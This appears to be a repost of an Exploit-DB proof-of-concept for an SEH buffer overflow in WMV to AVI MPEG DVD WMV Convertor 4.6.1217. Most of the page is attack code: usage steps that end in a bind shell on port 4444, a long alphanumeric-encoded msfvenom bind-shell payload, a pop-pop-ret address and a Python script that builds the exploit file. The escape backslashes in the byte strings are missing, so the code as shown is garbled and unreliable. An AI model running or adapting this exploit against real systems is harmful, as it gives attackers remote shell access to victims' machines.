Exploit/Advisories

Published on November 1st, 2019 📆 | 3245 Views ⚑

WMV to AVI MPEG DVD WMV Convertor 4.6.1217 – Buffer OverFlow (SEH)

# Exploit Title: WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)
# Google Dork: N/A
# Date: 2019-10-30
# Exploit Author: Doan Nguyen (4ll4u)
# Vendor Homepage:https://www.alloksoft.com/
# Software Link:  https://www.alloksoft.com/wmv.htm
# Version: v4.6.1217
# Tested on: Windows XP SP3
# CVE : N/A
# Reference from : [1] https://www.exploit-db.com/exploits/47563        

# 1.- Run python code :poc.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open  WMV to AVI MPEG DVD WMV Convertor and Click 'EnterKey'
# 4.- Paste the content of EVIL.txt into the Field: 'License Name and License Code'
# 5.- Click 'OK' and you will get a bind shell on port 4444

#msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -b 'x00' -f hex
#We need to create meaningful characters when pasting into the password on the application (allow characters include:x21->x7E in ASCII TABLE)
shellcode = (
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx53x2Ax52x25x2Dx53x2Ax52x25x2Dx55x2Ax52x25x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx23x34x4Dx68x2Dx23x34x4Dx68x2Dx24x36x4Dx69x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx62x5Cx30x75x2Dx62x5Cx30x75x2Dx62x5Ex31x75x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx60x73x71x3Bx2Dx60x73x71x3Bx2Dx61x75x73x3Dx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx4Bx39x6Fx40x2Dx4Bx39x6Fx40x2Dx4Cx39x70x40x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx62x47x44x27x2Dx62x47x44x27x2Dx63x47x45x27x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx38x49x2Ax35x2Dx38x49x2Ax35x2Dx38x49x2Ax36x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx5Dx71x68x26x2Dx5Dx71x68x26x2Dx5Dx71x6Ax28x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx47x21x25x28x2Dx47x21x25x28x2Dx49x22x27x29x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx44x56x34x3Cx2Dx44x56x34x3Cx2Dx45x58x35x3Cx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx57x31x33x44x2Dx57x31x33x44x2Dx58x32x34x45x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx3Cx6Ex4Fx50x2Dx3Cx6Ex4Fx50x2Dx3Ex70x50x52x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx3Fx38x33x5Fx2Dx3Fx38x33x5Fx2Dx40x39x33x60x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx6Fx4Dx38x22x2Dx6Fx4Dx38x22x2Dx6Fx4Fx3Ax24x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx62x72x56x55x2Dx62x72x56x55x2Dx63x74x58x55x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx4Bx66x52x53x2Dx4Bx66x52x53x2Dx4Cx67x52x54x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx3Bx22x35x71x2Dx3Bx22x35x71x2Dx3Cx22x37x72x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx2Ex4Fx64x55x2Dx2Ex4Fx64x55x2Dx2Ex51x65x55x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx59x48x59x5Ax2Dx59x48x59x5Ax2Dx5Bx4Ax59x5Bx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx49x62x5Cx5Ax2Dx49x62x5Cx5Ax2Dx4Ax64x5Cx5Cx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx63x54x2Ax47x2Dx63x54x2Ax47x2Dx65x55x2Ax47x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx48x4Dx4Dx43x2Dx48x4Dx4Dx43x2Dx49x4Fx4Ex45x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx30x75x60x3Ax2Dx30x75x60x3Ax2Dx32x75x60x3Ax50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx60x6Bx3Fx52x2Dx60x6Bx3Fx52x2Dx60x6Dx40x54x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx3Fx47x21x58x2Dx3Fx47x21x58x2Dx3Fx49x22x58x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx65x4Ex25x4Ax2Dx65x4Ex25x4Ax2Dx65x4Ex27x4Cx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx3Ex35x60x46x2Dx3Ex35x60x46x2Dx3Ex37x60x46x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx45x2Ex2Dx41x2Dx45x2Ex2Dx41x2Dx45x30x2Ex42x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx6Cx4Bx74x4Cx2Dx6Cx4Bx74x4Cx2Dx6Ex4Cx74x4Cx50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx42x43x29x26x2Dx42x43x29x26x2Dx43x43x2Ax27x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx2Fx61x43x34x2Dx2Fx61x43x34x2Dx31x61x45x34x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx50x58x4Bx69x2Dx50x58x4Bx69x2Dx52x59x4Dx6Ax50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx71x29x29x39x2Dx71x29x29x39x2Dx73x2Bx2Ax39x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx54x68x52x6Dx2Dx54x68x52x6Dx2Dx55x68x52x6Dx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx20x3Cx5Bx64x2Dx20x3Cx5Bx64x2Dx21x3Ex5Bx66x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx58x6Ex65x6Bx2Dx58x6Ex65x6Bx2Dx5Ax6Fx67x6Bx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx69x26x52x23x2Dx69x26x52x23x2Dx69x27x54x25x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx46x3Fx27x71x2Dx46x3Fx27x71x2Dx48x40x29x72x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx3Cx24x52x54x2Dx3Cx24x52x54x2Dx3Ex26x54x54x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx5Cx40x4Fx55x2Dx5Cx40x4Fx55x2Dx5Dx40x51x57x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx6Ax5Cx33x58x2Dx6Ax5Cx33x58x2Dx6Ax5Cx34x59x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx5Fx3Ex5Ax5Dx2Dx5Fx3Ex5Ax5Dx2Dx5Fx40x5Cx5Ex50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx49x4Dx6Ax3Bx2Dx49x4Dx6Ax3Bx2Dx4Ax4Fx6Cx3Cx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx62x23x6Bx3Dx2Dx62x23x6Bx3Dx2Dx63x23x6Bx3Fx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx23x6Ax57x67x2Dx23x6Ax57x67x2Dx24x6Cx57x67x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx23x43x60x50x2Dx23x43x60x50x2Dx25x43x60x50x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx73x31x34x2Ax2Dx73x31x34x2Ax2Dx73x33x34x2Bx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx38x56x63x59x2Dx38x56x63x59x2Dx39x56x65x59x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx40x52x60x66x2Dx40x52x60x66x2Dx41x53x61x67x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx24x61x73x2Ax2Dx24x61x73x2Ax2Dx26x61x75x2Ax50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx48x34x53x66x2Dx48x34x53x66x2Dx48x34x54x68x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx3Cx26x57x26x2Dx3Cx26x57x26x2Dx3Cx27x58x27x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx54x63x3Ax27x2Dx54x63x3Ax27x2Dx54x63x3Ax27x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx26x26x2Fx50x2Dx26x26x2Fx50x2Dx27x27x2Fx51x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx30x52x2Ex62x2Dx30x52x2Ex62x2Dx30x54x30x63x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx31x5Ax75x73x2Dx31x5Ax75x73x2Dx32x5Bx75x75x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx36x41x66x56x2Dx36x41x66x56x2Dx36x42x68x57x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx36x63x50x32x2Dx36x63x50x32x2Dx36x63x51x33x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx59x4Bx23x26x2Dx59x4Bx23x26x2Dx5Ax4Cx24x27x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx28x68x4Ax4Dx2Dx28x68x4Ax4Dx2Dx2Ax69x4Bx4Fx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx2Ex41x53x6Ax2Dx2Ex41x53x6Ax2Dx30x42x55x6Ax50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx6Fx6Ax2Fx6Dx2Dx6Fx6Ax2Fx6Dx2Dx6Fx6Ax2Fx6Ex50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx2Cx44x30x30x2Dx2Cx44x30x30x2Dx2Dx46x30x31x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx4Ax67x69x4Fx2Dx4Ax67x69x4Fx2Dx4Ax69x69x51x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx65x44x45x68x2Dx65x44x45x68x2Dx66x44x45x6Ax50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx6Fx57x32x45x2Dx6Fx57x32x45x2Dx6Fx59x34x47x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx35x2Cx45x43x2Dx35x2Cx45x43x2Dx37x2Cx46x45x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx69x4Ax5Ax6Dx2Dx69x4Ax5Ax6Dx2Dx6Ax4Ax5Cx6Fx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx2Fx54x6Bx5Ex2Dx2Fx54x6Bx5Ex2Dx2Fx56x6Bx60x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx40x25x6Ex55x2Dx40x25x6Ex55x2Dx41x26x6Ex57x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx52x6Fx33x2Dx2Dx52x6Fx33x2Dx2Dx52x70x33x2Fx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx3Ax6Ex6Dx3Dx2Dx3Ax6Ex6Dx3Dx2Dx3Bx6Ex6Ex3Ex50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx4Ex3Dx41x4Fx2Dx4Ex3Dx41x4Fx2Dx4Fx3Dx42x4Fx50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx49x28x48x64x2Dx49x28x48x64x2Dx4Ax28x49x64x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx73x2Ex5Ax59x2Dx73x2Ex5Ax59x2Dx74x2Ex5Ax59x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx4Ex68x29x3Ax2Dx4Ex68x29x3Ax2Dx4Fx68x2Bx3Bx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx21x32x38x36x2Dx21x32x38x36x2Dx22x32x38x36x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx53x4Cx2Bx47x2Dx53x4Cx2Bx47x2Dx54x4Cx2Bx47x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx5Cx2Fx47x6Bx2Dx5Cx2Fx47x6Bx2Dx5Ex31x47x6Bx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx6Dx35x37x5Cx2Dx6Dx35x37x5Cx2Dx6Dx35x39x5Dx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx28x35x41x22x2Dx28x35x41x22x2Dx28x36x43x22x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx2Dx40x6Fx2Bx2Dx2Dx40x6Fx2Bx2Dx2Fx41x6Fx2Cx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx20x42x3Cx2Bx2Dx20x42x3Cx2Bx2Dx21x43x3Ex2Dx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx3Fx4Ex54x2Bx2Dx3Fx4Ex54x2Bx2Dx3Fx50x54x2Bx50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx29x69x53x44x2Dx29x69x53x44x2Dx2Bx6Ax54x46x50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx62x6Bx6Fx39x2Dx62x6Bx6Fx39x2Dx62x6Cx6Fx39x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx67x6Cx40x26x2Dx67x6Cx40x26x2Dx69x6Ex41x27x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx49x59x36x44x2Dx49x59x36x44x2Dx4Ax59x37x46x50x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx61x68x61x2Ex2Dx61x68x61x2Ex2Dx61x68x63x2Ex50"
"x25x4Ax4Dx4Ex55x25x35x32x31x2Ax2Dx70x6fx6fx6fx50x50x50" # push 12 NOP 
)

alignment = "x54x58x2dx54x54x54x54x2dx37x63x54x54x2dx25x31x57x57x50x5C" # stack alignment 001292C0 - 0012AA10
jump_short = "x90x90xEBx08"  # jump to 00129A44
pop_pop_ret ="x09x9ax01x10" # pop pop ret in SkinMagic.dll
buffer = "x41" * 780 + jump_short + pop_pop_ret + "x41x41x41x41" + alignment + shellcode + (6000 - 780 - 4 - 4 - len(shellcode) - len(alignment)) * "x45"

try:
    f=open("shell.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

https://www.exploit-db.com/exploits/47568

Tagged with: buffer • convertor • overflow

Comments are closed.

WMV to AVI MPEG DVD WMV Convertor 4.6.1217 – Buffer OverFlow (SEH)

🌟 Your Account

🔔 Email Subscriptions

Get new posts by email

Donate Via Wallets

Popular

Gloss

☕️Social Media

👥Members

🌍 Forum Groups